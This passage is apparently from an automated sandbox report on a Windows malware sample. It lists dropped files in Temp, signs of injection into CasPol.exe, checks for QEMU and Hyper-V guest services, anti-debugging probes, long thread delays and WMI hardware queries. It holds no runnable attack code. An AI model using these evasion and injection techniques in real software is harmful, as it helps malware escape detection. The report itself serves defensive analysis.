          Source: Yara matchFile source: 00000005.00000000.62332198808.0000000000F00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_6F6730C0 push eax; ret 1_2_6F6730EE
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032BC74F push 3A3A3F63h; retf 1_2_032BC76A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032B8E23 pushad ; iretd 1_2_032B8E2E
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032B5AC9 push FFFFFF86h; iretd 1_2_032B5ACC
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032B9AD4 push esp; retf 1_2_032B9AD5
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032BC9C2 push ebp; iretd 1_2_032BC9C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_0134142F push edi; retn 0000h5_2_01341431
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_0134CC2A pushad ; ret 5_2_0134CC55
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_0134CC06 pushad ; ret 5_2_0134CC0D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_0134CC56 pushad ; ret 5_2_0134CC59
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_0134CC96 pushad ; ret 5_2_0134CC9D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_0134CC9E pushad ; ret 5_2_0134CCA5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_0134CC83 pushad ; ret 5_2_0134CC8D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_0134CC8E pushad ; ret 5_2_0134CC95
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_0134CCE6 pushad ; ret 5_2_0134CCE9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_0134CCE2 pushad ; ret 5_2_0134CCE5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_0134CCEE pushad ; ret 5_2_0134CCF1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_0134CCEA pushad ; ret 5_2_0134CCED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_0134CCDE pushad ; ret 5_2_0134CCE1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_0134CCDA pushad ; ret 5_2_0134CCDD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_0134CCCF pushad ; ret 5_2_0134CCD9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_0134CB26 pushad ; ret 5_2_0134CB29
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_0134CB16 push ss; ret 5_2_0134CB19
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_0134CB12 push ss; ret 5_2_0134CB15
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_0134CB1A pushad ; ret 5_2_0134CB25
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_0134CB6E pushad ; ret 5_2_0134CB75
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_0134CB46 push ss; ret 5_2_0134CB5D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_0134CBB2 pushad ; ret 5_2_0134CBBD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_0134CBBE pushad ; ret 5_2_0134CBC1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_0134CBAE push ss; ret 5_2_0134CBB1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_0134CBAA push ss; ret 5_2_0134CBAD
          Source: p11-kit-trust.dll.1.drStatic PE information: section name: .xdata
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_6F671BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,1_2_6F671BFF
          Source: MsMpLics.dll.1.drStatic PE information: 0xE6DA2BE7 [Wed Sep 24 01:22:47 2092 UTC]
          Source: initial sampleStatic PE information: section name: .text entropy: 6.94282730477
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeFile created: C:\Users\user\AppData\Local\Temp\nsi821.tmp\System.dllJump to dropped file
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeFile created: C:\Users\user\AppData\Local\Temp\System.IO.FileSystem.Watcher.dllJump to dropped file
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeFile created: C:\Users\user\AppData\Local\Temp\avutil-54.dllJump to dropped file
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeFile created: C:\Users\user\AppData\Local\Temp\lang-1045.dllJump to dropped file
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeFile created: C:\Users\user\AppData\Local\Temp\p11-kit-trust.dllJump to dropped file
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeFile created: C:\Users\user\AppData\Local\Temp\MsMpLics.dllJump to dropped file
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeFile created: C:\Users\user\AppData\Local\Temp\ARMOURY CRATE eGPU Product.exeJump to dropped file
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
          Source: SecuriteInfo.com.generic.ml.10062.exe, 00000001.00000002.62482616857.00000000033B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: NTDLLUSER32KERNEL32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 10.0; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXEWINDIR=\SYSWOW64\IERTUTIL.DLLWINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXEWINDIR=\SYSWOW64\IERTUTIL.DLLWINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXEWINDIR=\SYSWOW64\IERTUTIL.DLL
          Source: SecuriteInfo.com.generic.ml.10062.exe, 00000001.00000002.62482616857.00000000033B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 4232Thread sleep time: -2767011611056431s >= -30000sJump to behavior
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\System.IO.FileSystem.Watcher.dllJump to dropped file
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\avutil-54.dllJump to dropped file
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\lang-1045.dllJump to dropped file
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\p11-kit-trust.dllJump to dropped file
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MsMpLics.dllJump to dropped file
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ARMOURY CRATE eGPU Product.exeJump to dropped file
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032B1F29 rdtsc 1_2_032B1F29
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: threadDelayed 9940Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,1_2_00405D74
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_0040699E FindFirstFileW,FindClose,1_2_0040699E
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_0040290B FindFirstFileW,1_2_0040290B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeSystem information queried: ModuleInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeAPI call chain: ExitProcess graph end nodegraph_1-18275
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeAPI call chain: ExitProcess graph end nodegraph_1-18495
          Source: SecuriteInfo.com.generic.ml.10062.exe, 00000001.00000002.62483095871.0000000004F19000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.67190695311.0000000002D09000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
          Source: SecuriteInfo.com.generic.ml.10062.exe, 00000001.00000002.62482616857.00000000033B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ntdlluser32kernel32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\Microsoft.NET\Framework\v4.0.30319\caspol.exewindir=\syswow64\iertutil.dllwindir=\Microsoft.NET\Framework\v4.0.30319\caspol.exewindir=\syswow64\iertutil.dllwindir=\Microsoft.NET\Framework\v4.0.30319\caspol.exewindir=\syswow64\iertutil.dll
          Source: SecuriteInfo.com.generic.ml.10062.exe, 00000001.00000002.62483095871.0000000004F19000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.67190695311.0000000002D09000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
          Source: CasPol.exe, 00000005.00000002.67190695311.0000000002D09000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
          Source: SecuriteInfo.com.generic.ml.10062.exe, 00000001.00000002.62483095871.0000000004F19000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.67190695311.0000000002D09000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
          Source: SecuriteInfo.com.generic.ml.10062.exe, 00000001.00000002.62483095871.0000000004F19000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.67190695311.0000000002D09000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
          Source: avutil-54.dll.1.drBinary or memory string: yuv420pyuyv422rgb24bgr24yuv422pyuv444pyuv410pyuv411pgraygray8,y8monowmonobpal8yuvj420pyuvj422pyuvj444pxvmcmcxvmcidctuyvy422uyyvyy411bgr8bgr4bgr4_bytergb8rgb4rgb4_bytenv12nv21argbrgbaabgrbgragray16bey16begray16ley16leyuv440pyuvj440pyuva420pvdpau_h264vdpau_mpeg1vdpau_mpeg2vdpau_wmv3vdpau_vc1rgb48bergb48lergb565bergb565lergb555bergb555lebgr565bebgr565lebgr555bebgr555levaapi_mocovaapi_idctvaapi_vldyuv420p16leyuv420p16beyuv422p16leyuv422p16beyuv444p16leyuv444p16bevdpau_mpeg4dxva2_vldrgb444lergb444bebgr444lebgr444beya8gray8abgr48bebgr48leyuv420p9beyuv420p9leyuv420p10beyuv420p10leyuv422p10beyuv422p10leyuv444p9beyuv444p9leyuv444p10beyuv444p10leyuv422p9beyuv422p9levda_vldgbrpgbrp9begbrp9legbrp10begbrp10legbrp16begbrp16leyuva420p9beyuva420p9leyuva422p9beyuva422p9leyuva444p9beyuva444p9leyuva420p10beyuva420p10leyuva422p10beyuva422p10leyuva444p10beyuva444p10leyuva420p16beyuva420p16leyuva422p16beyuva422p16leyuva444p16beyuva444p16levdpauxyz12lexyz12benv16nv20lenv20beyvyu422vdaya16beya16leqsvmmald3d11va_vldrgba64bergba64lebgra64bebgra64le0rgbrgb00bgrbgr0yuva444pyuva422pyuv420p12beyuv420p12leyuv420p14beyuv420p14leyuv422p12beyuv422p12leyuv422p14beyuv422p14leyuv444p12beyuv444p12leyuv444p14beyuv444p14legbrp12begbrp12legbrp14begbrp14legbrapgbrap16begbrap16leyuvj411pbayer_bggr8bayer_rggb8bayer_gbrg8bayer_grbg8bayer_bggr16lebayer_bggr16bebayer_rggb16lebayer_rggb16bebayer_gbrg16lebayer_gbrg16bebayer_grbg16lebayer_grbg16beyuv440p10leyuv440p10beyuv440p12leyuv440p12beayuv64leayuv64bevideotoolbox_vldunknowntvpcreservedbt470mbt2020linearlog100log316iec61966-2-4bt1361eiec61966-2-1bt2020-10bt2020-20gbrycgcobt2020ncbt2020cunspecifiedleftcentertoplefttopbottomleftbottomrgb32bgr32le%s%sname nb_components nb_bits%-11s %7d %10dlibavutil/pixdesc.cd->log2_chroma_w <= 3d->log2_chroma_h <= 3d->nb_components <= 4d->name && d->name[0](d->nb_components==4 || d->nb_components==2) == !!(d->flags & (1 << 7))!c->plane && !c->step_minus1 && !c->offset_plus1 && !c->shift && !c->depth_minus1c->step_minus1 >= c->depth_minus18*(c->step_minus1+1) >= c->depth_minus1+1bayer_tmp[0] == 0 && tmp[1] == 0beyuvjpixelutils support is required but libavutil is not compiled with it
          Source: SecuriteInfo.com.generic.ml.10062.exe, 00000001.00000002.62483095871.0000000004F19000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.67190695311.0000000002D09000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
          Source: avutil-54.dll.1.drBinary or memory string: xvmcidct
          Source: CasPol.exe, 00000005.00000002.67190695311.0000000002D09000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
          Source: CasPol.exe, 00000005.00000003.63392916195.00000000011DA000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.67188286070.000000000117B000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.67188909794.00000000011DA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: SecuriteInfo.com.generic.ml.10062.exe, 00000001.00000002.62482616857.00000000033B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
          Source: SecuriteInfo.com.generic.ml.10062.exe, 00000001.00000002.62483095871.0000000004F19000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.67190695311.0000000002D09000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
          Source: CasPol.exe, 00000005.00000003.63392916195.00000000011DA000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.67188909794.00000000011DA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%k,
          Source: SecuriteInfo.com.generic.ml.10062.exe, 00000001.00000002.62483095871.0000000004F19000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.67190695311.0000000002D09000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
          Source: SecuriteInfo.com.generic.ml.10062.exe, 00000001.00000002.62483095871.0000000004F19000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.67190695311.0000000002D09000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
          Source: CasPol.exe, 00000005.00000002.67190695311.0000000002D09000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_6F671BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,1_2_6F671BFF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032B1F29 rdtsc 1_2_032B1F29
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032C121E mov eax, dword ptr fs:[00000030h]1_2_032C121E
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032C1954 mov eax, dword ptr fs:[00000030h]1_2_032C1954
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeCode function: 1_2_032BA4F9 mov eax, dword ptr fs:[00000030h]1_2_032BA4F9
          Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess queried: DebugPortJump to behavior
